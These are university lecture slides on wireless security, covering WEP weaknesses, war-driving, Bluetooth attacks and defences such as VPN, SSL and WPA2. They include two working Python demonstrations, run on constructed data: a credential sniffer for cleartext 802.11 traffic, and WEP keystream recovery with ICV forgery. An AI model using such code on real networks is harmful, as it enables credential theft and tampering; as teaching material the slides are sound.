Security in Wireless Technologies
Prof. Javier Echaiz
Dept. of Computer Science and Engineering
[email protected]
http://cs.uns.edu.ar/~jechaiz
Security in Wireless
Javier Echaiz 2
Roadmap
1. Wireless Technology
2. Wireless Hacking Examples
3. What to Do
4. Q & A
Wireless Technologies
"With great power comes great responsibility."
Peter Parker, Spiderman
"Nothing is free. This flexibility has its cost."
Javier Echaiz
Risks in Wireless
• Misconceptions about wireless security.
• Wireless threats in production: hotspots / rogue networks.
• DoS attacks, eavesdropping, protocol weaknesses, information disclosure, …
Risks (not covered in detail)
(figure: Risk = Threats × Vulnerabilities × Assets, each asset classified by its CIA levels)
Threats
• Physical: loss, theft, damage, physical access
• Data: data removal, malicious code, storage CIA
• Access control: unauthorized device, unauthorized user
• Transmission: transmission CIA
• Connection: unapproved AP, unapproved network
Vulnerabilities
• Administrative: user behavior, policy, procedures
• Physical: surveillance, hostile environment, TEMPEST, visitor control, inspection, fragile equipment, public placement
• Technical: identification, authentication, access control, protection mechanism, key management, engagement
Assets
• Network: equipment, available
• Data / resource: sensitivity, criticality
• Devices: mobile devices, removable storage
Classification: Confidentiality [H, M, L], Integrity [H, M, L], Availability [H, M, L]
"CIA" = confidentiality, integrity, availability
Definition (1)
• An Ethernet network carried over radio waves instead of cables.
• A tool for convenience, ideally when mobility is required.
• A solution when connections are needed only for short periods of time.
Definition (2)
• A technology that can solve problems which, for various reasons, cannot be solved with wired technologies:
– Places where it is impossible to keep adding cables, for whatever reason.
– Areas too large for cabling to be practical.
– Classrooms.
– Etc.
What Wireless is not:
Wireless technologies are NOT a replacement for wired connections!
Wireless is neither secure, nor fast, nor reliable.
Wireless is inherently insecure
• Data on a wireless connection is broadcast over an open radio channel (like a walkie-talkie, short-wave radio, cell phone, etc.), or
• Wireless data travels "protected" by an insecure standard: WEP (Wired Equivalent Privacy), which is easily cracked and based on a shared secret. Since every station uses the same key, anyone allowed onto the network can read everything on it!
Wireless is inherently insecure - there are many ways to attack:
• Pretending to be someone/something else:
– SSID attack
– Malicious association
– MAC spoofing
– Man-in-the-middle attack
• Direct and denial-of-service attacks:
– Insertion attack
– Encryption attack
– Jamming
Insecure: Easily Hijacked
Malicious association: an attacker sets up a rogue access point, configures it to display a fake login page, and collects usernames and passwords. This is probably the most likely scenario at universities. Using the security tools mentioned later in this presentation is a good way to avoid falling for this trap.
Insecure: Easily Sniffed
“Sniffing” a connection means listening in (much like atap on a phone) and pulling useful information out of thedata stream. Most data is sent “clear text” which meansthat the sniffer can read it with little effort.
Security: Why the user should care
• System administrators are often asked by users:
• "Why should I care about security? Nothing I do is confidential."
ARE YOU SURE?
Security: Why the user should care (1)
• Think about your password. How many systems do you use it on? E-mail, file server, your on-line banking/brokerage, one-click buying at Amazon.com (where they have your credit card number on file), airline reservation sites or travel agents.
• If someone gets your password, they can access any of those.
Security: Why the user should care (2)
• Always use different passwords on different systems. That way, if one password gets compromised, the rest of your accounts will still be protected.
Security: Why the user should care (3)
• Is any student information (IDs, grades, etc.) ever sent in e-mail? These and other data are considered confidential. There are legal issues regarding the safety and accessibility of information.
• What if someone accessed your e-mail and sent a threatening or harassing e-mail to someone? How could you prove it wasn't you? Your word is often not enough.
• "Sniffing" wireless traffic is trivially easy with free, easy-to-download, easy-to-use software.
Sniffing an SSH session (screenshot)
This is a similar session when the end user is using encryption (SSH). The sniffer is out of luck.
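What "sniffing" means in practice, for both the clear-text case above and the SSH case on this slide, is easier to see with code than with a screenshot. The following is an added example written for this edit, not code from the slides or from any of the sniffers named later (Wireshark, Kismet, Airopeek). It builds a few constructed 802.11 data frames carrying IPv4/TCP (addresses, IPs, logins and the SSH banner are all made up for the demonstration), then walks them the way a passive sniffer would: parse the 802.11 header, the LLC/SNAP and IP/TCP headers, and pull POP3/FTP `USER`/`PASS` lines and HTTP Basic credentials out of the payload. An SSH session yields nothing usable past the banner, and a frame with the Protected bit set (WEP/WPA) is skipped because its body is ciphertext.

```python
import base64
import re
import struct

LLC_SNAP_IPV4 = bytes.fromhex("aaaa030000000800")  # LLC/SNAP header for IPv4 in 802.11 data frames


def build_tcp_frame(sa, da, bssid, src_ip, dst_ip, sport, dport, payload, protected=False):
    """Constructed station-to-AP (ToDS=1) 802.11 data frame carrying IPv4/TCP.
    Checksums are left zero; the sniffer below does not verify them."""
    fc = 0x0008 | 0x0100 | (0x4000 if protected else 0)  # data frame, ToDS, optional Protected bit
    # FC, duration, A1=BSSID, A2=SA, A3=DA, sequence control
    dot11 = struct.pack("<HH", fc, 0) + bssid + sa + da + struct.pack("<H", 0)
    tcp = struct.pack(">HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack(">BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0x4000, 64, 6, 0, src_ip, dst_ip)
    return dot11 + LLC_SNAP_IPV4 + ip + tcp


def extract_tcp(frame):
    """Pull the IPv4/TCP payload out of an 802.11 data frame. Returns None if the frame
    is not parsable TCP, or {'protected': True} if the body is WEP/WPA ciphertext."""
    fc, = struct.unpack("<H", frame[:2])
    if (fc >> 2) & 0x3 != 2:          # type 2 = data frame
        return None
    if fc & 0x4000:                   # Protected Frame bit: nothing to read without the key
        return {"protected": True}
    to_ds, from_ds = bool(fc & 0x100), bool(fc & 0x200)
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    if to_ds and from_ds:             # 4-address (WDS) frame: A4 holds SA
        sa, da, hlen = frame[24:30], a3, 30
    elif to_ds:                       # station -> AP
        sa, da, hlen = a2, a3, 24
    elif from_ds:                     # AP -> station
        sa, da, hlen = a3, a1, 24
    else:                             # ad hoc
        sa, da, hlen = a2, a1, 24
    if (fc >> 4) & 0x8:               # QoS data subtype adds a 2-byte QoS control field
        hlen += 2
    body = frame[hlen:]
    if body[:8] != LLC_SNAP_IPV4:
        return None
    ip = body[8:]
    ihl = (ip[0] & 0xF) * 4
    if ip[9] != 6:                    # protocol 6 = TCP
        return None
    tcp = ip[ihl:]
    sport, dport = struct.unpack(">HH", tcp[:4])
    doff = (tcp[12] >> 4) * 4
    return {"protected": False, "sa": sa, "da": da, "src_ip": ip[12:16], "dst_ip": ip[16:20],
            "sport": sport, "dport": dport, "payload": tcp[doff:]}


CLEARTEXT_LOGIN = re.compile(rb"^(USER|PASS) +(\S+)\r?$", re.M)                 # POP3 / FTP
HTTP_BASIC = re.compile(rb"^Authorization: Basic ([A-Za-z0-9+/=]+)\r?$", re.M)  # HTTP Basic auth


def sniff_credentials(frames):
    """Walk captured frames and return (dport, kind, value) for every cleartext credential."""
    found = []
    for frame in frames:
        t = extract_tcp(frame)
        if not t or t["protected"]:
            continue
        for m in CLEARTEXT_LOGIN.finditer(t["payload"]):
            found.append((t["dport"], m.group(1).decode(), m.group(2).decode()))
        for m in HTTP_BASIC.finditer(t["payload"]):
            found.append((t["dport"], "Basic", base64.b64decode(m.group(1)).decode()))
    return found


def demo():
    # Constructed capture: one client talking to one server through one AP.
    sta, ap, srv = bytes.fromhex("66778899aabb"), bytes.fromhex("001122334455"), bytes.fromhex("0c29aabbccdd")
    c_ip, s_ip = bytes([10, 0, 0, 7]), bytes([192, 168, 1, 20])
    frames = [
        build_tcp_frame(sta, srv, ap, c_ip, s_ip, 40001, 110, b"USER alice\r\nPASS hunter2\r\n"),
        build_tcp_frame(sta, srv, ap, c_ip, s_ip, 40002, 80,
                        b"GET /mail HTTP/1.1\r\nHost: mail.example\r\nAuthorization: Basic "
                        + base64.b64encode(b"bob:s3cret") + b"\r\n\r\n"),
        # SSH: only the version banner is cleartext; the rest is encrypted (constructed bytes here)
        build_tcp_frame(sta, srv, ap, c_ip, s_ip, 40003, 22, b"SSH-2.0-OpenSSH_4.3\r\n" + bytes(range(64))),
        # same POP3 login, but on a WEP/WPA-protected link: the sniffer never sees the payload
        build_tcp_frame(sta, srv, ap, c_ip, s_ip, 40004, 110, b"USER carol\r\nPASS letmein\r\n", protected=True),
    ]
    return sniff_credentials(frames)


if __name__ == "__main__":
    for dport, kind, value in demo():
        print(f"port {dport}: {kind} {value}")
```

The point to take away is that the attacker needs no special position: any card in monitor mode within range receives these frames, and the only frames that give nothing away are the SSH one (encrypted above the banner) and the one whose link layer is encrypted.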
The wireless card itself is a new avenue of attack.
• Your hard drive is accessible. If you're not actively using the card, disable it or remove it.
Security solutions
It is possible to be mostly safe using wireless technology, but the end user must be very careful. More later in this presentation.
Speed (1)
• Wireless is considerably slower than wires.
• It's a shared resource, so the more people use it, the less there is for you.
Speed (2)
• It doesn't take much to have the wireless connection slow down to modem-like speeds.
• Unless the user is sitting right next to the access point, the best speed they might get is low (7 to 11 Megabits), and as soon as there is any interference, the speed drops dramatically.
• If there are other users, the available bandwidth is split between them. In addition, more users create more interference, so the speed goes down even further.
Blocked by a human hand… (screenshot)
• This shows how the strength of the signal is decreased by placing a hand over the wireless card.
• Green is good signal, red is interference, purple is dropped signal.
Interference by other technology (screenshot)
• This shows how much interference is added by using a 2.4 GHz cordless phone near the wireless card.
• Green is good signal, red is interference, purple is dropped signal.
So, what can the user do about...
• Speed: well, nothing, except get a better signal (move closer, remove obstacles).
• Reliability: again, not much. Laws of physics are fairly immutable, after all. Next-generation access points may have some other solutions: different bandwidths, more redundancy in the data transfer, etc.
• Security: lots! That's what most of the rest of this presentation is about.
How the Wirewall works: (1)
• The user starts up their machine and opens a web browser to go to their favorite site.
• The Wirewall sees the connection request and redirects the user to the Wirewall login page.
Wirewall-specific X.500 login (screenshot). This authentication process is encrypted.
How the Wirewall works: (3)
• The Wirewall sends the authentication data to the X.500 (central authentication) server and checks to make sure that the user is OK.
• The X.500 server sends back a 'yes' or 'no.'
• If 'yes,' the Wirewall server opens a connection for that client (laptop) for a certain amount of time.
• This whole process is encrypted.
How the Wirewall works: (4)
• After the authentication process finishes, the Wirewall redirects the client back out to the original website.
• From here on out, unless the client is using their own encryption, everything is insecure: the Wirewall only controls who gets onto the network, it does not encrypt the radio link.
• This authentication process must be followed before the client is allowed past the Wirewall onto the University network and/or the Internet (unless a VPN is used, more on that later).
Using Wireless Safely
• Be smart and aware
• Disable the wireless card unless it is in use.
• Use encryption:
– VPN (Virtual Private Network)
– SSH (for TELNET, FTP, POP, IMAP, X-Win, etc.)
– SSL (e-mail, web browsing)
Using Wireless Safely: Be Smart and Aware
• Always keep in mind that the information you may be transmitting might be confidential, important, legally protected, or potentially damaging.
• If it is any of those things, take steps to be safe.
• But always remember, part of the process will be out of your control. Do you trust the entire system/process?
VPN: Advantages / Disadvantages
• Advantages:
– Encrypts all of the data from the client to the VPN server, not just certain applications.
– Compresses data; can speed up the connection.
– Bypasses Wirewall authentication and authenticates on the VPN server.
– Easy to use once it is set up.
• Disadvantages:
– Does not encrypt anything beyond the VPN server.
– All encryption slows down the connection, but this is probably offset by the compression.
– Has to be set up in advance.
– Bye bye roaming.
Using Wireless Safely
• Use encryption:
– VPN (Virtual Private Network)
– SSH (Secure Shell): for TELNET, FTP, POP, IMAP, X-Win, etc.
– SSL (Secure Sockets Layer): e-mail, web browsing
SSH / SSL
• SSH and SSL are both single-connection encryption methods which should be used whenever possible.
• SSH (Secure Shell) tends to be used by telnet/ftp-like applications such as SFTP/SCP, and for tunneling.
• SSL (Secure Sockets Layer) tends to be used by e-mail and web connections.
SSH/SSL: Advantages & Disadvantages
• Advantages:
– Encrypts data all the way from the client to the destination server.
– Can be used for multiple destinations.
– Easy to use once it is set up.
• Disadvantages:
– Only encrypts the data sent through the SSH / SSL channel.
– All encryption slows down the connection.
– SSH: each connection needs a different setup.
SSL Usage
• In web browsers:
– Generally initiated by the server, and the user is redirected to a secure site, often after a login page.
– Uses certificates (Thawte, Verisign, or self-signed). A self-signed certificate gives no assurance of who is at the other end, which is exactly the rogue access point scenario above: do not click through certificate warnings on a wireless network.
– Confirm by checking the lock icon in the lower left or right-hand corner of the browser window.
• E-mail: SSL / PGP.
VPN vs. SSH/SSL
• A VPN encrypts the connection from the client to the VPN server. After that, the data is on its own.
• SSH/SSL encrypt the data ALL the way from the client to the final destination.
• You CAN use both at the same time.
The wireless card itself is a new avenue of attack.
• Your hard drive is accessible. If you're not actively using the card, disable it or remove it.
• If you have both your wired connection and your wireless connection plugged in and turned on, an attacker can use the wireless access to 'bridge' over and access the wired network.
Yesterday and Today
• Last year:
– The NO Wireless policy
– WEP
– Captive portals
• This year:
– Face it, you have wireless: policy
– WPA2 + authentication
– VPN
– Firewall / policy enforcement
– Bluetooth in everything
– Fake access points
– WiMax
– EvDO
• Hacking attempts:
– War driving/walking/flying
– Disgruntled employee
– Industrial espionage
– Electronic warfare
Whose WAP are you connected to, anyway?
Who are you connected to?
War Driving
"For everything else, there's MC!"
• Equipment:
– Laptop: US$ 1300
– Wireless card: US$ 60
– Antenna: US$ 10 (homebrew)
– Scanning software: free
– GPS (optional)
Equipment
• Antennas:
– Omni-directional: mast mount
– Semi-directional: Yagi
– Highly directional: grid, parabolic
• Home-brew antennas
Equipment
• Laptops: *BSD, GNU/Linux, M$ Windows, Mac OS X, etc.
• Handhelds: HP iPaq, Sharp Zaurus, etc.
Interception Range (figure)
Basic Service Set (BSS): a single cell, with a station outside the building perimeter still inside it.
Equipment
• Scanning software:
– Net Stumbler: www.netstumbler.com
– Airopeek: www.wildpackets.com
– Wellenreiter: www.remote-exploit.org
– KISMET: www.kismetwireless.net
– AirSnort: airsnort.shmoo.org
The Air in my kitchen… (screenshot)
Bluetooth Security
• Wireless standard for personal area networks (PANs):
– Replaces wired connections
– A few devices that a person carries
– A few devices on a user's desktop
Bluetooth: Where?
• Cars, phones, PDAs, laptops, printers, earpieces, keyboards and mice, Coke machines
Blue Sniffing and…
• Smurf
• MeetingPoint
• BTScanner
• BlueSweep
• BlueWatch (not free)
• Blue Jack
The Blue Attack
• Hooking up?
• Open microphone
• Dialing for dollars
• Contacts, notes, e-mail
IrDA
• Laptop, phone, Blackberry, PDA, keyboards/mice
• Is yours enabled?
• Easy transfer
• Banana sticker
EvDO
• Evolution-Data Only / Evolution-Data Optimized
• High speed, always on
• 2.4 Mbps bandwidth
• Supported by some cell phones
• PCMCIA cards
Wired Equivalent Privacy (WEP)
• Basic encryption mechanism for wireless networks
• Uses RC4 for encryption
• Designed to prevent casual traffic-sniffing attacks
• There are a number of failures associated with WEP and a variety of attacks to defeat it: a 24-bit IV that repeats quickly (keystream reuse), a CRC-32 integrity check that is linear and therefore forgeable, and a weak RC4 key schedule (the FMS attack).
WEP Attacks
• Vendor implementation weakness:
– Neesus Datacom key-generation algorithm
– wep_crack (effective for 40-bit only)
• Dictionary attacks: WEPAttack
• FMS attacks: Aircrack(-ng)
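The "shared secret" problem from the earlier slide and the WEP failures listed on these two slides can all be shown on a small model of WEP. The following is an added example written for this edit, not code from the slides or from wep_crack, WEPAttack or aircrack-ng. It implements RC4 and WEP framing (24-bit IV sent in clear, RC4 keyed with IV || key, CRC-32 ICV appended before encryption) and, on a constructed key, IV and two constructed packets, shows three things: (a) anyone holding the shared key decrypts every frame; (b) two frames encrypted under the same IV share a keystream, so one known plaintext reveals the other with no key at all; (c) CRC-32 is linear, so an attacker can flip chosen plaintext bits in the ciphertext and patch the ICV so the frame still verifies. The FMS key-recovery attack itself is not reproduced here.

```python
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key-scheduling, then the generator XORed over data."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def crc32(data: bytes) -> int:
    return zlib.crc32(data) & 0xFFFFFFFF


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: IV (3 bytes, in clear) || RC4_{IV||key}(plaintext || ICV)."""
    assert len(iv) == 3
    icv = struct.pack("<I", crc32(plaintext))
    return iv + rc4(iv + key, plaintext + icv)


def wep_decrypt(key: bytes, frame: bytes):
    """Returns (plaintext, icv_ok). Any station holding the shared key can do this."""
    iv, body = frame[:3], frame[3:]
    pt_icv = rc4(iv + key, body)
    plaintext, icv = pt_icv[:-4], pt_icv[-4:]
    return plaintext, struct.unpack("<I", icv)[0] == crc32(plaintext)


def recover_by_iv_reuse(frame_a: bytes, frame_b: bytes, known_plaintext_a: bytes) -> bytes:
    """Two frames under the same key and IV use the same keystream:
    C_a xor P_a gives the keystream, which then strips C_b without the key."""
    assert frame_a[:3] == frame_b[:3], "attack needs an IV collision"
    keystream = xor(frame_a[3:], known_plaintext_a)
    return xor(frame_b[3:], keystream)


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """Change plaintext bits without the key. CRC-32 is linear:
    crc(P xor D) = crc(P) xor crc(D) xor crc(0...0), so the ICV can be patched too.
    delta must be as long as the plaintext payload."""
    iv, body = frame[:3], frame[3:]
    icv_delta = crc32(delta) ^ crc32(bytes(len(delta)))
    return iv + xor(body, delta + struct.pack("<I", icv_delta))


def demo() -> dict:
    key = bytes.fromhex("0102030405")          # constructed 40-bit WEP key
    iv = bytes.fromhex("0a0b0c")               # constructed IV, reused for both frames
    request = b"GET /index.html HTTP/1.0"      # constructed; an attacker can guess this one
    secret = b"user=alice&pass=hunter2!"       # constructed; same length as the request
    f_req = wep_encrypt(key, iv, request)
    f_sec = wep_encrypt(key, iv, secret)

    # (a) shared key: any station with the key reads every frame
    pt, ok = wep_decrypt(key, f_sec)
    # (b) IV reuse: no key needed, just one known plaintext under the same IV
    recovered = recover_by_iv_reuse(f_req, f_sec, request)
    # (c) ICV is not a MAC: rewrite 'alice' to 'carol' in transit, ICV still verifies
    delta = bytearray(len(secret))
    delta[5:10] = xor(b"alice", b"carol")
    forged_pt, forged_ok = wep_decrypt(key, flip_bits(f_sec, bytes(delta)))
    return {
        "shared_key_plaintext": pt, "shared_key_ok": ok,
        "iv_reuse_recovered": recovered,
        "forged_plaintext": forged_pt, "forged_icv_ok": forged_ok,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

With only 2^24 IVs and many cards resetting the IV counter to zero, collisions like the one in (b) are a matter of minutes on a busy network, which is why "easily crackable" on the earlier slide is not an exaggeration; (c) is the basis of the insertion and encryption attacks listed under "Direct attacks".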
802.1x/EAP Overview
• Weaknesses and administrative problems of wireless networks:
– How do you distribute dynamic keys?
– How do you authenticate users?
• Solution: a LEAP of faith!
Wi-Fi Protected Access (WPA)
• WPA is a subset of the (then draft) 802.11i specification, which is dedicated to improving the security of wireless networks
• Two major problems with upgrading the security of wireless networks:
– It had to be done as a software upgrade
– Lack of available processing capacity in wireless equipment
• Temporary solution: Temporal Key Integrity Protocol (TKIP)
References
• Wireshark: http://www.wireshark.org
• Kismet: http://www.kismetwireless.net
• wep_crack: http://www.lava.net/~newsham/wlan/
• WEPAttack: http://wepattack.sourceforge.net
• Aircrack-ng: http://www.aircrack-ng.org
• Asleap: http://asleap.sourceforge.net
• Cowpatty: http://sourceforge.net/projects/cowpatty
• File2air: http://secwatch.org/wifidownload.php?cat=5
• http://wirelessdefence.org
Top 10 for wireless security
1. Change the AP's default password (and username).
2. Use the best standard supported (WPA2, WEP-256, etc.). Note that WEP of any key length falls to the attacks above; WPA2 is the only option here that actually protects the traffic.
3. Change the AP's default SSID.
4. Enable MAC filtering (remember it is not a panacea!).
5. Disable SSID broadcast.
6. Do not connect automatically to open Wi-Fi networks.
7. Assign static IPs / disable DHCP.
8. Enable a firewall on both the router (/AP) and each device.
9. Place the router/AP in a good spot (signals leak out!).
10. Turn the network off when it will not be used for a long time.
Items 4, 5 and 7 only deter casual users: MAC addresses are trivially spoofed (see MAC spoofing above), a hidden SSID is revealed by any client's probe requests, and static addressing is no obstacle to a sniffer.
Fundamental: education!
Wireless Definition (Expansion)
(figure: on the corporate side, a corporate access point, a corporate laptop, data and a phone on a 1.0 Gb network; on the uncontrolled side, a rogue access point, an uncontrolled access point and wireless-capable devices such as a USB drive, an iPod and a non-corporate laptop)
• Threats shown: theft / usurpation, access, mobile data storage, data removal, malicious code
• Interception, interference, damage
Securing Wireless at Work
• The security policy
• Authentication
• Authorization
• VPN
• DMZ
• Wireless on its own VLAN
• Hardened wireless gateway
• Device policy enforcement
• Passwords on devices
• Auto-erase on devices when password authentication fails a set number of times
• Disable, remove, or scratch out IrDA ports that are not needed
• Physical examination of the site regularly
• Wireless audits
• IDS
Secure 802.11 at Home
• WEP:
– RC4
– 64 bit
– 128 bit, more secure (slightly slower)
– Pass phrase
• WPA:
– Pre-shared keys
• TKIP: Temporal Key Integrity Protocol. TKIP uses stronger per-packet keying and incorporates a Message Integrity Code (MIC) for additional protection. Still RC4.
• AES: Advanced Encryption Standard, a symmetric 128-bit block cipher (the WPA2 cipher).
• Pre-shared keys vs. RADIUS: with RADIUS, an external RADIUS server performs user authentication (802.1x).
More Home Security
• MAC filtering
• SSID
• VPN
• Best practices… what not to do on your wireless segment
• DMZ
• Firewalls
Robust Security Network Association
(figure: message flow between the supplicant (wireless device), the authenticator (access point) and the RADIUS server)
1. 802.11 association: supplicant and authenticator become associated.
2. EAP/802.1X/RADIUS authentication: supplicant and RADIUS server derive the MSK (master session key); the RADIUS server delivers the MSK to the authenticator.
3. PMK (pairwise master key): derived from the MSK at both the supplicant and the authenticator.
4. 4-way handshake: both sides derive the PTK (pairwise transient key); the authenticator delivers the GTK (group temporal key).
5. Group key handshake: a new GTK is distributed, used for broadcast and multicast traffic.
6. Data.
WEP vs. WPA vs. WPA2

                  WEP                              WPA                               WPA2
Encryption        RC4                              RC4 (TKIP)                        AES
Key rotation      None                             Dynamic session keys              Dynamic session keys
Key distribution  Manually typed into each device  Automatic distribution available  Automatic distribution available
Authentication    Uses the WEP key as AuthC        Can use 802.1x & EAP              Can use 802.1x & EAP
Non-discoverable Phones
• Most Bluetooth devices allow you to make them non-discoverable.
• They then do not answer inquiry scans.
• An attacker can still brute-force the device address and connect directly.
• The Redfang tool does this for you.
Bluetooth Attacks
• Bluesnarfing: vulnerabilities in OBEX implementations allow unauthenticated access to Bluetooth services, e.g. dumping all contacts.
• Backdooring: once a device is paired, access is still allowed even after that device is removed from the paired list.
• Bluebugging: creating an unauthenticated serial-over-Bluetooth connection, which gives full access to the phone and reportedly allows attacks such as turning the phone into a listening device.
• Bluejacking: sending unsolicited messages (e.g. a vCard) to a nearby device; commonly used to trick the user into accepting a pairing or connection.